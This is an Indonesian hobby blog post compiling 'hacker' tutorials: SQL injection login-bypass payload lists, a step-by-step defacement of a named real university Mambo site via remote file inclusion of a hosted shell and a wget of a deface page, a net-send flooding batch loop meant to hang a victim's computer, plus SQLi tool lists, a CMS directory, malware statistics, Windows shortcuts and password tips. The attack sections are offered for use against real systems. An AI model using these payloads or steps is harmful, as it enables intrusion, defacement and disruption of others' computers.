Arabic Korean Japanese Chinese Simplified English French German Spain Italian
Browser Support

COLECTION PHOTO

colek

ADAM BROW

BELAJAR DI DUNIA MAYA seperti DUNIA DA DITANGAN KITA belajarlah di blog ni. slamat mencoba

Rabu, 01 Agustus 2012

HACKER

KUMPULAN ILMU HECKER

DASAR HACKING SOL INJECTION






SQL singkatan dari Structured Query Language yg merupakan bahasa komputer standar yg ditetapkan oleh ANSI (American National Standard Institute) untuk mengakses dan memanupulasi sistem database. SQL bekerja dgn program2 database seperti MS Access, DB 2, Informix, MS SQL Server, Oracle, Sybase dan lain sebagainya.

SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking utk menggapai akses pada sistem database yg berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL dalam mengolah suatu sistem database. Hasil yg ditimbulkan dari teknik ini membawa masalah yg sangat serius. Mengapa disebut SQL Injection ? seperti yg kita ketahui, injection jika diartikan ke dalam bahasa Indonesia yaitu "suntikan". Yang terjadi memang seperti melakukan suntikan terhadap SQL yg tujuannya adalah tergantung kepada pelakunya dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.

Sudah disinggung diatas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemprograman scripting pada SQL maksudnya adalah memanfaatkan teknik string building untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yg terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yg dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang.

Keuntungan yg diambil adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya.

Input Query String

Default setting dari SQL menggunakan :

adminID = sa

password ='' (kosong atau blank)

misalnya : http://www.target.com/login.asp?adminID=sa%20password='' %20 artinya menggantikan "jarak spasi"

Ini merupakan kondisi yg berbahaya jika pengubahan setting tidak segera dilakukan.

Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :

SQLQuery="SELECT Username FROM Users WHERE Username="' strUsername&"'strpassword&"'

Pada verifikasi terdapat kelemahan pada pemprosesan pada string2 tertentu yg sebenarnya string tersebut dapat dikatakan sebagai input ilegal. Verifikasi tetap melakukan proses dan nantinya menghasilkan error page. Error page tersebut justru membuka rahasia struktur database dan bahkan error page tetapi eksekusi terhadap validasi input tetap dijalankan.

Contoh : menggunakan injection string 'OR''= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :

SELECT Username FROM Users WHERE Username=''OR''='' AND Password=''OR''=''

Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.

Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :

'or 1=1--
'or 0=0 --
'or 'x'='x
'or a=a-
"or 0=0 --
"or 0=0 #
"or "x"="x
")or("a"="a
admin'--
hi" or 1=1 --
hi' or'a'='a
hi")or("a"="a
or 0=0 #
'or a=a--
'or 0=0 #
'having 1=1--
"or 1=1--
"or "a"="a
')or('a'='a
')or('x'='x
hi" or "a"="a
hi' or 1=1 --
hi')or('a'='a
or 0=0 --
or 1=1--

Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang. Contoh :

'UPDATE YEPCell_memberDB set Credits=100 wher UserID='yamakasi'

SQl Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat mencarinya di www.google.com. kutipan dari J4mbi H4ck3r

DEFACE SITUS MAMBO
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://sukan.upm.edu.my/Buletin/index.php?option=com_content&task=view&id=17&Itemid=2

2. Kemudian hapus/delete option=com_content&task=view&id=17&Itemid=2 di url/browsing sehingga menjadi http://sukan.upm.edu.my/Buletin/index.php?

3. Masukkan bug ini di belakang situs tadi :

_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

Misal nya http://sukan.upm.edu.my/Buletin/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=

4. Masukkan file inject ini di belakang nya lagi :

http://k.domaindlx.com/jambihackerlinkcrew/sql2.htm

Misal nya http://sukan.upm.edu.my/Buletin/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://k.domaindlx.com/jambihackerlinkcrew/sql2.htm?

5. Di kolom Execute Command ketik :

find / -perm 777 -type d atau find / -perm 755 -type d

Tunggu beberapa saat.......

6. Kalo foldernya Permision Denied berarti kita tidak bisa apa2 di folder itu. Cari folder yg tidak ada tulisan Permision Denied.

Contoh Permision Denied :

find: /var/tux: Permission denied
find: /var/gdm: Permission denied
find: /tmp/ssh-XXcnJoE9: Permission denied
find: /tmp/orbit-root: Permission denied

Kita cari yg lain tapi usahakan foldernya yg /var/www/ kalo tidak ada juga tidak apa2.

Contoh folder yg bisa : /opt/orion

7. Masukkan file deface ini :

http://k.domaindlx.com/jambihackerlinkcrew/jh.htm

8. Di kolom Execute Command ketik :

cd /opt/orion;wget http://k.domaindlx.com/jambihackerlinkcrew/jh.htm

Tunggu beberapa saat.......

10:35:02 (4 KB/s) - `jh.htm' saved

Itu artinya sukses ke save

9. Cara lihat hasil nya :

http://sukan.upm.edu.my/Buletin/opt/orion/[file deface tadi]

10. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://sukan.upm.edu.my/Buletin/opt/orion/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing. kutipan dari J4mbi H4ck3r


TEHNIK SQL INJECTION
TEHNIK SQL INJECTION
Kata hacker pada jaman sekarang ini sudah tidak asing lagi ditelinga kita khususnya dunia information technology (IT) dan hacker yang dulu dipandang sebagai penjahat, pencuri atau pembobol suatu system komputer sekarang sudah bergeser , keberadaan hacker yang identik dengan aktifitas underground kini sudah mulai menampakan diri, sebagai contoh dinegara negara maju , perusahaan perusahaan besar yang mempunyai system komputer yang besar sudah mulai menyewa hacker hacker untuk mencari kelemahan kelemahan system mereka.

SQL INJECTION
Tehnik hacking sql injection mulai mencuat kepermukaan semenjak dijebolnya situs
KPU pada pemilu putaran pertama kemarin oleh Dani Firmansyah atau Xnuxer , dengan
teknik ini beliau dapat masuk sebagai web administrator tanpa susah payah scan port
port yang terbuka , tanpa terdeteksi oleh firewall dan tanpa tool .ke situs tersebut yang
konon system yang seharga 152 milyar itu keamanannya berlapis lapis
Apa yang penulis bahas ini adalah basic atau dasar dasar dari teknik hacking yang
dinamakan sql injection , teknik ini memungkinkan kita masuk ke suatu system yang
terproteksi sebagai siapa saja dengan hanya mengetahui username tanpa harus
mengetahui passwordnya bahkan kita juga bisa login tanpa perlu mengetahui
username dan password sama sekali
Diilustrasikan STMIK-IM mempunyai situs dengan nama www.stmik-im.ac.id , untuk
mengelola situs ini administrator membuat halaman web untuk atifitas update semua
halaman web sehingga bisa dikelola darimanapun dan kapanpun , halaman web tersebut
tersimpan di www.stmik-im.ac.id/admin.asp , untuk mengamankan halaman2 yang
dikhususkan untuk web administrator ini , web admin membuat halaman web yang
terproteksi yang berfungsi sebagai pintu masuk ke halama2 berikutnya ,sehingga setiap
user yang akan masuk ke halaman halaman yang terproteksi harus memasukan username
dan password mereka , daftar password dan user tersebut tersimpan dalam sql server
dengan nama table admin dengan field field diantaranya username dan password.
Statement sql bukanlah bahasa pemrograman seperti pascal,Delphi atau visual basic ,
statemen sql biasanya digunakan bersama sama dengan bahasa pemrograman lain pada
saat mengakses database , pada ilustrasi diatas , untuk mencocokan user yang login ,
maka digunakan statemen sql yang kurang lebih sebagai berikut
Select * from admin where username = input_username
And password = input_password
Sebagai contoh apabila penulis sebagai administrator dengan username = administrator
dan password = admin bermaksud login maka sql statemennya sebagai berikut
Select * from admin where username = ‘administrator’ and
Password = ‘admin’
Dapat dipastikan bahwa apabila field username terdapat record administrator dengan filed
password terdapat admin penulis dapat melewati proteksi dan masuk kehalaman
berikutnya ,akan tetapi apabila sebaliknya ,maka akan keluar pesan kesalahan yang
kurang lebih isinya kita tidak bisa masuk ke halaman berikutnya , lalu bagaimana kalau
penulis memasukan input ‘ or ‘’=’ pada username dan password , perhatikan perubahan
statemen sql berikut ini
Select * from admin where username = ‘’ or ‘’ = ‘’ and
Password = ‘’ or ‘’=’’
Logika OR menyebabkan statement membalikan nilai false jadi true sehingga kita bisa
masuk sebagai user yang terdapat pada record pertama dalam table admin ( record
pertama biasanya administrator) , dan bagaimana kalo kita hanya mengetahui username
saja tapi passwordnya tidak , misalkan username = administrator , caranya cukup
sederhana , pada text box tempat menginput username isi dengan “administrator’—“
sedangkan pada textbox password boleh diisi sembarang misalkan ‘ or ‘’=’ maka
statement sql akan berubah menjadi
Select * from admin where username = ‘ administrator ‘—“
And password = ‘’ or ‘’=’’
Tanda “—“ (dua tanda minus) di sql server berarti akhir dari statement sql sehingga
perintah dibelakannya tidak dieksekusi lagi.
Untuk web admin , bagaimana cara mencegahnya , jangan izinkan user menginput
selain karakter a - z atau A - Z atau 0 – 9 , selain dari pada itu ditolak pada saat
pengecekan.



FLOODING JARINGAN


Mungkin ada yang ingin bertanya, “bagaimana seh caranya flooding ke komputer lain dalam satu network?” dan mungkin akan ada juga pertanyaan “kenapa anda ingin melalukan flooding ke komputer lain dalam 1 network?”.

Nah, alasannya ada beragam. Bisa karena kesal dengan calon korban, bisa karena sekedar iseng, bisa karena ingin nambah ilmu aja, ato alasan apa aja. Tapi untuk jawaban yang pertama, akan saya beri sedikit turorial berupa scriptnya.

OK..!!! ikuti langkah2 berikut ini :

1. Run command prompt/cmd anda, caranya klik start > run > cmd
2. Saat command prompt anda muncul, ketik edit hi.bat
3. Maka tampilan command prompt anda akan berbeda. setelah itu masukkan/ketikkan code di bawah ini :

net send [ipkomputer]/[namakomputer] hi
call hi.bat

kemudian save as file tersebut.

Saat ingin melakukan flooding, tingal klik 2 kali file batch tersebut…

Ket :

* hi.bat bisa pada langkah 2 bisa diganti dangan nama apa saja, asal tidak spasi dan harus berekstensi .bat dan jangan lupa juga mengganti hi.bat pada code dengan nama yang sama pada langkah 2.
* jika ga tau nama komputer yang terhubung di jaringan, run cmd, lalu ketik “net view” (tanpa tanda petik2) dan juga saat dimasukkan tanpa tanda [ dan ]. Ingat juga, pilih antara ip ato nama komputer.
* cara ini hanya bisa dilakukan jika service messenger pada windows anda dan komputer tujuan di aktifkan
* yang terakhir..!!!! flooding ini akan mengirim pesan “hi” (bisa diganti) berulang-ulang hingga komputer tujuan hang. jadi gunakan dengan bijak.

SQL Injection merupakan teknik hacking paling populer pada aplikasi web dengan prinsip melewatkan perintah-perintah SQL lewat aplikasi web untuk dieksekusi oleh database back-end. Kelemahan akan muncul apabila inputan user tidak disaring/difilter dengan sempurna dan akhirnya dieksekusi.

Mengidentifikasi kelemahan SQL Injection akan melibatkan proses auditing aplikasi web secara keseluruhan, cara paling ampuhdan efektif menurut security-hacks.com adalah dengan menggunakan SQL Injection Scanner. Beberapa diantaranya:

SQLIer: mengambil URL yang vulnerable dan mencoba mendapatkan semua informasi untuk mengeksploit kelemahan tanpa membutuhkan interaksi user.
SQLbftools: kumpulan tools untuk memperoleh informasi MySQL dengan menggunakan teknik Blind SQL Injection.
SQLNinja: tool yang memanfaatkan kelemahan SQL Injection pada aplikasi web berbasis Microsoft SQL Server sebagai database back-end.


SQL Injection Brute-forcer
SQLBrute
BobCat
SQLMap
Absinthe
SQL Injection Pen-testing Tool
SQID
Blind SQL Injection Perl Tool
SQL Power Injection
FJ-Injector Framework
Automagic SQL Injector
NGSS SQL Injector





CMS BERDASARKAN KATEGORI


Listing CMS berdasarkan kategori dan sekaligus situs developernya.
Ads Management:
Openads http://www.openads.org/
phpList http://www.phplist.com/
BBS/Forum/Message Boards:
Aterr http://chimaera.starglade.org/aterr
bbPress http://www.bbpress.org/
Ekinboard http://www.ekinboard.com/
FUDforum http://www.fudforum.org/
MyBB http://www.mybboard.com/
miniBB http://www.minibb.net/
Phorum http://www.phorum.org/
phpBB3 http://www.phpbb.com/
PunBB http://www.punbb.org/
SMF http://www.simplemachines.org/
UNB http://newsboard.unclassified.de
UseBB http://www.usebb.net/
Vanilla http://www.getvanilla.com/
W-agora http://www.w-agora.net/
Xchangeboard http://www.xchangeboard.de/
XMB Forum http://www.xmbforum.com/
Yappa-ng http://www.zirkon.at/
YetAnotherForum http://www.yetanotherforum.net/
Blogs:
b2evolution http://www.b2evolution.net/
bBlog http://www.bblog.com/
BirdBlog http://www.birdblog.org/
BLOG:CMS http://www.blogcms.com/
blur6ex http://www.blursoft.com/
boastMachine http://www.boastology.com/
DotClear http://www.dotclear.net/
feedonfeeds http://www.feedonfeeds.com/
LifeType http://www.lifetype.net/
Loudblog http://www.loudblog.de/
Nucleus http://www.nucleuscms.org/
Pixelpost http://www.pixelpost.org/
pMachine Free http://www.pmachine.com/
reBlog http://www.reblog.org/
sBLOG http://www.servous.se/
Serendipity http://www.s9y.org/
Simplog http://www.simplog.org/
Textpattern http://www.textpattern.com/
TruBlog http://www.trublog.org/
Wheatblog http://wheatblog.sourceforge.net
WordPress http://www.wordpress.org/
WordPress MU http://mu.wordpress.org
WordPattern http://www.wordpattern.org/
Calendars:
Maian Events http://www.maianscriptworld.co.uk/
Clasified Ads:
Classifieds http://classifieds.phpoutsourcing.com
CMS/Portals:
Bitweaver http://www.bitweaver.org/
CivicSpace http://www.civicspacelabs.org/
Clever Copy http://clevercopy.bestdirectbuy.com
CMS Made Simple http://www.cmsmadesimple.org/
Community Server http://www.communityserver.org/
Contenido http://www.contenido.org/
Dragonfly CMS http://www.cpgnuke.com/
Dev http://dev-wms.sourceforge.net
DotNetNuke (DNN) http://www.dotnetnuke.com/
Drupal http://www.drupal.org/
e107 http://www.e107.org/
EcwCMS http://www.ecwcms.com/
Exponent http://www.exponentcms.org/
eZ publish http://www.ez.no/
Fundanemt http://www.fundanemt.com/
fuzzylime http://www.fuzzylime.co.uk/
Geeklog http://www.geeklog.net/
IndexScript http://www.indexscript.com/
Indexu http://www.nicecoder.com/
Jaws http://www.jaws.com.mx/
Jetbox http://jetbox.streamedge.com
Joomla! http://www.joomla.com/ atau http://www.joomla.org/ *koreksi dari dwikristianto*
Jupiter http://www.highstrike.net/
Mambo Open Source http://www.mamboserver.com/
MDPro http://www.maxdev.com/
MODx http://www.modxcms.com/
Moodle http://www.moodle.org/
Netious http://www.netious.com/
OneCMS http://www.insanevisions.com/
Open-Realty http://www.open-realty.org/
Ovidentia http://www.ovidentia.org/
Papoo http://www.papoo.de/
PHP-Fusion http://www.php-fusion.co.uk/
PHP-Nuke http://www.phpnuke.org/
PhpComasy http://www.phpcomasy.org/
phpLinkDirectory http://www.phplinkdirectory.com/
phpSlash http://www.php-slash.org/
phpWCMS http://www.phpwcms.de/
phpWebSite http://phpwebsite.appstate.edu
PHPX http://www.phpx.org/
Plume CMS http://www.plume-cms.net/
Post-Nuke http://www.postnuke.com/
PROPS http://props.sourceforge.net
Siteframe http://www.siteframe.org/
SPIP http://www.spip.net/
toendaCMS http://www.toenda.com/
Typo3 http://www.typo3.org/
vtiger http://www.vtiger.com/
Website Baker 2 http://www.websitebaker.org/
Xaraya http://www.xaraya.com/
Xoops http://www.xoops.org/
YACS http://www.yetanothercommunitysystem.com/
Customer Support:
Crafty Syntax Live Help http://www.craftysyntax.com/
Help Center Live http://www.helpcenterlive.com/
osTicket http://www.osticket.com/
PerlDesk (Commercial, needs license) http://www.perldesk.com/
PHP Support Tickets http://www.triangle-solutions.com/
phpMyChat http://www.phpheaven.net/
PHPTickets http://www.phpsupporttickets.com/
Support Logic Helpdesk http://www.support-logic.com/
Support Services Manager http://scripts.sheddtech.com
E-Commerce:
CubeCart http://www.cubecart.com/
Osc2nuke http://www.osc2nuke.com/
OSCommerce http://www.oscommerce.com/
OSCommRes http://www.oscommres.com/
PHPAdsNew http://www.openx.org/
PHPauction http://www.phpauction.org/
phpShop http://www.phpshop.org/
SugarCRM http://www.sugarforge.org/
ZenCart http://www.zen-cart.com/
FAQ:
FAQMasterFlex http://www.technetguru.net/
phpMyFAQ http://www.phpmyfaq.de/

GroupWare Tools Project Managements
:
ACollab http://www.atutor.ca/
dotProject http://www.dotproject.net/
eGroupWare http://www.egroupware.org/
netOffice http://netoffice.sourceforge.net
phpGroupWare http://www.phpgroupware.org/
PHProject http://www.phprojekt.com/
PMTool http://www.pmtool.org/
Guestbooks:
MJguest http://www.mdsjack.bo.it/
ViPER Guestbook http://www.vipergb.de.vu/
Hosting Billing:
AccountLab Plus http://www.netenberg.com/
phpCOIN http://www.phpcoin.com/
phpFormGenerator http://phpformgen.sourceforge.net
Image Galleries:
4images Gallery http://www.4homepages.de/
Coppermine Photo Gallery http://coppermine.sourceforge.net
DAlbum http://www.dalbum.org/
Gallery http://gallery.menalto.com
Gallery2 http://codex.gallery2.org
JAlbum http://www.jalbum.net/
LinPHA http://linpha.sourceforge.net
MG2 http://www.minigal.dk/
Plogger http://www.plogger.org/
Singapore http://singapore.sourceforge.net
Snipe Gallery http://www.snipegallery.com/
WEBalbum http://www.web-album.org/
Mailing List:
PHPlist http://www.tincan.co.uk/
Polls and Surveys:
phpESP http://phpesp.sourceforge.net
PHPSurveyor http://phpsurveyor.sourceforge.net
Search Engine:
Copernic http://www.copernic.com/
Site Builders:
Soholaunch Pro Edition
(Commercial, needs license) http://www.soholaunch.com/
Templates Express http://www.netenberg.com/
Social Bookmarking:
PLIGG htpp://www.pligg.com/ *tambahan dari 2mk*
Website Add-Ons:
Aardvark Topsites PHP http://www.aardvarktopsites.com/
ObieWebsite.sf.net http://obiewebsite.sourceforge.net
Perl Script Page http://www.proxy2.de/
Wiki:
DokuWiki http://wiki.splitbrain.org/
ErfurtWiki http://erfurtwiki.sourceforge.net
MediaWiki http://www.mediawiki.org/
PhpWiki http://phpwiki.sourceforge.net
PmWiki http://www.pmwiki.org/
QwikiWiki http://www.qwikiwiki.com/
TikiWiki http://www.tikiwiki.org/
UniWakka http://uniwakka.sourceforge.net
WackoWiki http://www.wackowiki.com/
WikkaWiki http://www.wikkawiki.org/
Wikepage http://www.wikepage.org/
WikkiTikkiTavi http://tavi.sourceforge.net
WikiWikiWeb http://www.phpwiki.org/
Other Scripts:
All Free Download Script by Category http://www.download3000.com/scriptsall.html *tambahan dari tanahsirah*
Comic Update Script (phpComic) http://cusp.sourceforge.net
Dew-NewPHPLinks http://www.dew-code.com/
evoDev http://www.evo-dev.com/
Factory Nova http://www.factorynova.com/
FormMail http://www.formmail.com/
Matt’s Script Archive http://www.scriptarchive.com/
Noah’s Classifieds http://classifieds.phpoutsourcing.com
openDB http://opendb.iamvegan.net
phpArena http://www.phparena.net/
phpCollab http://www.php-collab.com/
phpmycounter http://www.timlinden.com/
SiteBar http://www.sitebar.org/
sRecommender http://www.biglickmedia.com/
WebCalendar http://webcalendar.sourceforge.net
WebCards http://www.mywebcards.net/
source: adsense-sby.com




100 PROGRAM JAHAT DI INDONESIA

Berikut adalah daftar 100 program jahat paling top di Indonesia yang terlacak Kaspersky pada periode 1 Januari 2009 - 19 Januari 2009. Angka dalam persen menunjukkan tingkat ditemukannya program itu:

* Worm.Win32.AutoTDSS.hn 16.8469%
* HEUR:Trojan.Win32.Generic 11.9442%
* Heur.Win32.Trojan.Generic 11.3675%
* Trojan-Proxy.Win32.Agent.mf 4.9748%
* Net-Worm.Win32.Kido.s 4.422%
* Net-Worm.Win32.Kido.ih 3.1963%
* Trojan-Downloader.Win32.Small.aacq 2.5955%
* Trojan-Dropper.Win32.Small.axv 2.5715%
* Heur.Win32.Invader 2.5715%
* Worm.Win32.AutoTDSS.bcw 2.4033%
* Trojan-GameThief.Win32.Magania.gen 2.3071%
* Trojan-Dropper.Win32.Agent.bvn 2.2591%
* Net-Worm.Win32.Kido.t 2.0908%
* Trojan-Downloader.Win32.Agent.wxq 1.2497%
* Trojan.Win32.Agent2.w.a 1.1776%
* Worm.Win32.Downloader.yw 1.0815%
* Trojan.Win32.Qhost.kmq 1.0094%
* Trojan-Dropper.Win32.Agent.zje 0.8892%
* Trojan-Dropper.Win32.Small.cdw 0.6729%
* Trojan.Win32.Agent.bhug 0.6489%
* Trojan.Win32.Agent.bdzl 0.6008%
* HEUR:Trojan-Downloader.Win32.Generic 0.6008%
* HEUR:Trojan.Win32.Invader 0.5768%
* Heur.Win32.Downloader 0.5047%
* Trojan.Win32.Agent.bfnz 0.5047%
* Trojan-Downloader.Win32.Agent.arqp 0.4807%
* Trojan.Win32.Obfuscated.gen 0.4326%
* Trojan-Downloader.Win32.Small.izw 0.4086%
* Net-Worm.Win32.Kido.bt 0.4086%
* Trojan.Win32.Monder.gen 0.3845%
* Net-Worm.Win32.Kido.eo 0.3845%
* Trojan-Downloader.Win32.CodecPack.dbn 0.3845%
* Multi.Win32.Packed 0.3605%
* bukan virus:FraudTool.Win32.Antivirus2009.eg 0.3365%
* Trojan-Downloader.Win32.Agent.bbvy 0.3365%
* Net-Worm.Win32.Kido.ed 0.3124%
* Trojan-Downloader.Win32.Small.ailx 0.3124%
* Packed.Win32.PolyCrypt.d 0.2884%
* Trojan-Spy.Win32.FtpSend.b 0.2884%
* Net-Worm.Win32.Koobface.dn 0.2884%
* Trojan-Downloader.Win32.Agent.bcmd 0.2403%
* Net-Worm.Win32.Kido.da 0.2403%
* bukan virus:AdWare.Win32.180Solutions.bj 0.2403%
* Net-Worm.Win32.Kido.bg 0.2163%
* Worm.Win32.Downloader.yv 0.2163%
* Trojan-Spy.Win32.VB.bee 0.2163%
* Net-Worm.Win32.Kido.c 0.2163%
* Net-Worm.Win32.Kido.cu 0.2163%
* Net-Worm.Win32.Kido.bx 0.1923%
* Net-Worm.Win32.Kido.bw 0.1923%
* Virus.Win32.VB.ki 0.1923%
* Suspicious.Win32.Packer 0.1923%
* Trojan.Win32.FraudPack.aie 0.1923%
* Trojan-Downloader.Win32.FraudLoad.cxs 0.1923%
* Trojan-Mailfinder.Win32.Delf.cr 0.1923%
* Trojan.Win32.Agent.bcan 0.1682%
* Net-Worm.Win32.Kido.gx 0.1682%
* Net-Worm.Win32.Kido.dw 0.1682%
* bukan virus:Porn-Dialer.Win32.InstantAccess.e0.1682%
* bukan virus:AdWare.Win32.Thingies 0.1682%
* Net-Worm.Win32.Kido.fa 0.1682%
* Trojan-Downloader.Win32.FraudLoad.vgjq 0.1682%
* Trojan-Spy.Win32.VB.bev 0.1442%
* Trojan.Win32.Agentb.ah 0.1442%
* Backdoor.Win32.VB.hfq 0.1442%
* Trojan-Downloader.Win32.FraudLoad.cxo 0.1442%
* bukan virus:AdWare.Win32.OneStep.z 0.1442%
* Virus.Win32.Alman.b 0.1442%
* Virus.Win32.Sality.aa 0.1442%
* Net-Worm.Win32.Kido.cq 0.1202%
* Backdoor.Win32.VB.hdt 0.1202%
* bukan virus:AdWare.Win32.Relevant.n 0.1202%
* Trojan-Downloader.Win32.Tiny.byt 0.1202%
* Net-Worm.Win32.Kido.dt 0.1202%
* Net-Worm.Win32.Kido.bi 0.1202%
* Trojan-PSW.Win32.IMMultiPass.od 0.1202%
* bukan virus:AdWare.Win32.Shopper.v 0.1202%
* Trojan-Dropper.Win32.Delf.clr 0.1202%
* Net-Worm.Win32.Koobface.dw 0.1202%
* Trojan-Downloader.Win32.CodecPack.deo 0.0961%
* Trojan-Mailfinder.Win32.Delf.cq 0.0961%
* Trojan-Spy.Win32.VB.beq 0.0961%
* bukan virus:AdWare.Win32.Relevant.a 0.0961%
* Net-Worm.Win32.Kido.ci 0.0961%
* Backdoor.Win32.VB.hfr 0.0961%
* Net-Worm.Win32.Kido.fc 0.0961%
* Trojan-Downloader.Win32.BHO.ape 0.0961%
* Net-Worm.Win32.Kido.hs 0.0961%
* Net-Worm.Win32.Kido.ce 0.0961%
* Net-Worm.Win32.Kido.bm 0.0961%
* Hoax.Win32.Renos.vber 0.0961%
* Trojan-Downloader.Win32.Agent.bakk 0.0961%
* Trojan.Win32.Inject.mvu 0.0961%
* Trojan.Win32.Agent.aoxh 0.0961%
* Net-Worm.Win32.Kido.i 0.0961%
* Trojan-Dropper.Win32.Small.ayg 0.0961%
* Trojan-Downloader.Win32.Agent.ahyl 0.0961%
* Net-Worm.Win32.Kido.fl 0.0961%
* Trojan.Win32.Inject.nlj 0.0961%
* Net-Worm.Win32.Kido.fm 0.0961%





21 TRIK KEYBOARD WINDOWS 7


ini akan berguna jika kita dalam situasi sibuk dan terlalu malas untuk menggunakan mouse. Dan bukan hanya itu, trik ini juga dapat agan jadikan untuk mengerjai teman kantor Tapi mungkin ada beberapa shortcut yang tidak dapat dijalankan. hal ini biasanya bersangkutan dengan hardware dari komputer kita. tapi untungnnya semua trik ini bisa kita jalankan di PC kita sendiri.


Trik Aero Shortcuts

[Windows] + [Spacebar]
Anda akan melihat dekstop dan membuat semua menjadi transparan. Hal ini akan sama jika kursor mouse ada di pojok kanan bawah layar.

[Windows] + [D]
Menuju Deskto tanpa banyak basa basi.. tekan 2x maka akan kembali ke worksheet awal sebelum ke desktop

[Windows] + [Home]
Minimize semua kecuali windows yang kita select

[Windows] + Arah Kiri / Arah Kanan
Fungsinya seperti rata kanan atau rata kiri jendela aktif

[Windows] + Arah atas atau [Windows] + arah bawah
Maximize atau minimize

[Windows] + [Tab]
Ini yang paling asik.. membuat worksheet menjadi 3D


[Alt] + [Ctrl] + [Tag] + Tombol kiri/kanan/atas/bawah
Flip window. Bisa bikin temen stress nih

[Alt] + [Tab]
Biasa sih ini mah

[Windows] + [T] atau [Windows] + [SHIFT] + [T]
Efek ini sama seperti ketika arahkan mouse pada taskbar aktif yang ada di samping tombol windows

[Windows] + [ B ]
Memfokus tombol “show hidden icons” di system tray.

[Windows] + [1] hingga [9] atau [Windows] + [SHIFT] + [1] hingga [9]
sama seperti mengklik icon yang ada di taskbar (samping tombol windows) urutannya 1,2,3,4…..9

[Windows] + [Ctrl] + [1] hingga [9]
Membuka program yang ada di taskbar dengan waktu yang sama.

[Windows] + [Alt] + [1] hingga [9]
sama seperti kita klik kanan di icon taskbar


Multiple Monitors

[Windows] + [P]
Mode Screen. biasanya berguna untuk presentasi menggunakan projector



Magnifier

[Windows] + [+] atau [Windows] + [-]
Mengaktifkan menu Magnifier untuk men-zoom windows

[Ctrl] + [Alt] + [D]
Memperbesar dengan mode dock

[Ctrl] + [Alt] + [L]
Memperbesar seperti mode Loop


[Ctrl] + [Alt] + [F]
Full Screen Mode on sob

[Ctrl] + [Alt] + [i]
Invert colors.

[Windows] + [Esc]
Keluar

[Windows] + [G]
Melihat gadget

[Windows] + [X]
Menjalankan Windows Mobility Center





MEMPERCEPAT BROWSER FIREFOX



Bagi pengguna Firefox yang ingin menambah kecepatan browser, metode-metode berikut ini bisa dicoba

Metode 1:

1. Buka browser Mozilla Firefox.
2. Ketik 'about:config' pada address bar, lalu tekan enter.
3. Turunkan halaman sampai Anda menemukan kalimat 'browser.tabs.showSingleWindowsModePrefs', lalu double klik sehingga settingannya menjadi 'true'.
4. Turunkan lagi halaman Firefox sampai Anda menemukan baris berbunyi 'network.http.pipelining', lalu double klik sehingga settingannya juga menjadi 'true'.
5. Terakhir, turunkan lagi halaman Firefox dan carilah baris yang berbunyi 'network.http.pipelining.maxrequests', lalu double klik. Anda akan disuguhi sebuah window pop up. Ubahlah angka di pop up itu menjadi 60. Kemudian tekanlah 'Ok'.
6. Tutup Firefox lalu coba buka kembali. Jika tidak ada masalah, Firefox Anda akan terbuka 10-40 persen lebih cepat daripada sebelumnya dengan langkah-langkah seperti di atas.

Metode 2:

Langkah mujarab lain untuk meningkatkan kecepatan Firefox adalah dengan menggunakan add-on untuk Firefox bernama FasterFox. FasterFox ini membuat pemakaian bandwidth lebih efektif sehingga bisa mempercepat performa Firefox. Anda bisa mendownload FasterFox di alamat: http://fasterfox.mozdev.org. dikutip dari detiknet


MEMBUAT PASSWORD YANG SULIT DIBOBOL HECKER

Jaman sekarang yang namanya hacker atau cracker semakin kreatif, dengan berbagai cara mereka berusaha menembus email Anda, friendster, rekening online, web site, bahkan blog.Anda tidak mau kan, kalau suatu saat profile Anda di friendster diubah oleh orang? Atau web site Anda tiba-tiba di ganti tampilannya oleh hacker / cracker ?


Salah satu cara hacker menembus account kita adalah dengan cara menebak password. Hacker menggunakan script yang dapat memasukkan puluhan password tiap detik untuk mencoba masuk ke dalam account kita.

Cara hacker menebak password kita antara lain dengan:

1. Brute force attack, yaitu dengan mencoba semua kombinasi, mulai dari aaaa sampai zzzz, sampai beberapa karakter.
2. Dictionary attack, yaitu dengan menebak menggunakan kata-kata dalam kamus, dan dikombinasikan dengan angka-angka atau karakter.
3. Personal information attack, dengan cara memasukkan data-data pribadi seperti nomor telepon, tanggal lahir, nama pacar, kode pos, dan sebagainya.

Password yang sangat lemah akan sangat mudah dibobol hacker dengan cara ini. Contoh password yang sangat lemah misalnya:

* 123456, qwerty, asdf, ini karena mudah sekali orang mengetik kombinasi ini di keyboard.
* password, mypassword, dan lain-lain yang menggunakan kata-kata dalam kamus (semua bahasa).
* tanggal lahir, nama pacar, dan lainnya yang merupakan data diri orang tersebut.

